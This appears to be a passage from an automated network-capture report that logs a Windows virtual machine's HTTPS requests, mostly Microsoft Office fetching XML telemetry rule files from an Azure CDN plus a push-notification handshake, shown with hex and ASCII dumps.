                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:47 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:47 GMT
                      Content-Type: text/xml
                      Content-Length: 400
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                      ETag: "0x8DC582BB2D62837"
                      x-ms-request-id: 04edad6e-301e-0052-440b-4265d6000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165147Z-174f7845968swgbqhC1EWRmnb400000016eg000000002fw0
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:47 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                      Session IDSource IPSource PortDestination IPDestination Port
                      55192.168.2.64977313.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:47 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:48 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:48 GMT
                      Content-Type: text/xml
                      Content-Length: 479
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                      ETag: "0x8DC582BB7D702D0"
                      x-ms-request-id: 6644a72f-f01e-001f-6d66-435dc8000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165148Z-174f7845968nxc96hC1EWRspw8000000160g000000005q4c
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:48 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      56192.168.2.64977420.198.119.143443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:48 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 76 49 59 4f 78 74 6e 2b 58 6b 4f 66 73 55 4a 55 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 31 65 33 39 30 65 37 66 37 65 35 33 37 63 0d 0a 0d 0a
                      Data Ascii: CNT 1 CON 305MS-CV: vIYOxtn+XkOfsUJU.1Context: a81e390e7f7e537c
                      2024-12-03 16:51:48 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                      2024-12-03 16:51:48 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 76 49 59 4f 78 74 6e 2b 58 6b 4f 66 73 55 4a 55 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 31 65 33 39 30 65 37 66 37 65 35 33 37 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 42 33 33 77 58 39 56 4c 44 37 43 76 62 50 53 6d 79 55 30 61 6f 64 4e 4e 46 38 4f 56 49 48 66 2f 43 6c 36 5a 43 41 71 66 65 4c 32 58 35 33 68 63 64 44 62 4e 6c 69 48 64 65 59 45 64 33 64 4e 58 69 79 43 44 77 4b 39 39 35 47 6a 52 55 57 4f 53 74 30 75 6e 6d 51 33 72 50 43 72 44 55 58 6a 4c 4a 56 56 50 56 32 48 70 42 56 63 32
                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: vIYOxtn+XkOfsUJU.2Context: a81e390e7f7e537c<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARB33wX9VLD7CvbPSmyU0aodNNF8OVIHf/Cl6ZCAqfeL2X53hcdDbNliHdeYEd3dNXiyCDwK995GjRUWOSt0unmQ3rPCrDUXjLJVVPV2HpBVc2
                      2024-12-03 16:51:48 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 76 49 59 4f 78 74 6e 2b 58 6b 4f 66 73 55 4a 55 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 61 38 31 65 33 39 30 65 37 66 37 65 35 33 37 63 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: vIYOxtn+XkOfsUJU.3Context: a81e390e7f7e537c<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                      2024-12-03 16:51:49 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                      Data Ascii: 202 1 CON 58
                      2024-12-03 16:51:49 UTC58INData Raw: 4d 53 2d 43 56 3a 20 70 30 4c 35 57 4d 72 54 6e 6b 43 69 43 4d 65 74 6d 49 37 67 56 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                      Data Ascii: MS-CV: p0L5WMrTnkCiCMetmI7gVg.0Payload parsing failed.


                      Session IDSource IPSource PortDestination IPDestination Port
                      57192.168.2.64977513.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:49 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:49 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:49 GMT
                      Content-Type: text/xml
                      Content-Length: 425
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                      ETag: "0x8DC582BBA25094F"
                      x-ms-request-id: be2d73de-001e-002b-2f62-4399f2000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165149Z-174f7845968swgbqhC1EWRmnb400000016ag00000000hftw
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:49 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                      Session IDSource IPSource PortDestination IPDestination Port
                      58192.168.2.64977713.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:49 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:49 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:49 GMT
                      Content-Type: text/xml
                      Content-Length: 448
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                      ETag: "0x8DC582BB389F49B"
                      x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165149Z-174f7845968pf68xhC1EWRr4h800000016fg00000000a2fc
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:49 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                      Session IDSource IPSource PortDestination IPDestination Port
                      59192.168.2.64977613.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:49 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:50 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:49 GMT
                      Content-Type: text/xml
                      Content-Length: 475
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                      ETag: "0x8DC582BB2BE84FD"
                      x-ms-request-id: fdf69e8b-201e-000c-4300-4279c4000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165149Z-174f7845968glpgnhC1EWR7uec00000016f00000000004g4
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:50 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      60192.168.2.64977813.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:49 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:50 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:50 GMT
                      Content-Type: text/xml
                      Content-Length: 491
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                      ETag: "0x8DC582B98B88612"
                      x-ms-request-id: 21da0aac-a01e-0021-7d18-43814c000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165150Z-174f7845968psccphC1EWRuz9s00000016hg000000002ht9
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:50 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      61192.168.2.64977913.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:50 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:50 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:50 GMT
                      Content-Type: text/xml
                      Content-Length: 416
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                      ETag: "0x8DC582BAEA4B445"
                      x-ms-request-id: 6da3e3c6-601e-0084-52b4-426b3f000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165150Z-174f7845968pf68xhC1EWRr4h800000016f000000000bgq3
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:50 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                      Session IDSource IPSource PortDestination IPDestination Port
                      62192.168.2.64978013.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:51 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:52 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:51 GMT
                      Content-Type: text/xml
                      Content-Length: 479
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                      ETag: "0x8DC582B989EE75B"
                      x-ms-request-id: f0b66c9a-b01e-0021-14ef-44cab7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165151Z-174f784596886s2bhC1EWR743w000000164g00000000tmd6
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:52 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                      Session IDSource IPSource PortDestination IPDestination Port
                      63192.168.2.64978113.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:51 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:52 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:51 GMT
                      Content-Type: text/xml
                      Content-Length: 415
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                      ETag: "0x8DC582BA80D96A1"
                      x-ms-request-id: 9d60b28b-101e-0017-33c7-4347c7000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165151Z-174f7845968cdxdrhC1EWRg0en000000164000000000knh6
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
                      2024-12-03 16:51:52 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                      Session IDSource IPSource PortDestination IPDestination Port
                      64192.168.2.64978213.107.246.63443
                      TimestampBytes transferredDirectionData
                      2024-12-03 16:51:51 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                      Connection: Keep-Alive
                      Accept-Encoding: gzip
                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                      Host: otelrules.azureedge.net
                      2024-12-03 16:51:52 UTC470INHTTP/1.1 200 OK
                      Date: Tue, 03 Dec 2024 16:51:52 GMT
                      Content-Type: text/xml
                      Content-Length: 471
                      Connection: close
                      Cache-Control: public, max-age=604800, immutable
                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                      ETag: "0x8DC582B97E6FCDD"
                      x-ms-request-id: 4c860516-801e-00a3-3252-437cfb000000
                      x-ms-version: 2018-03-28
                      x-azure-ref: 20241203T165152Z-174f7845968swgbqhC1EWRmnb400000016cg000000009vrx
                      x-fd-int-roxy-purgeid: 0
                      X-Cache: TCP_HIT
                      Accept-Ranges: bytes
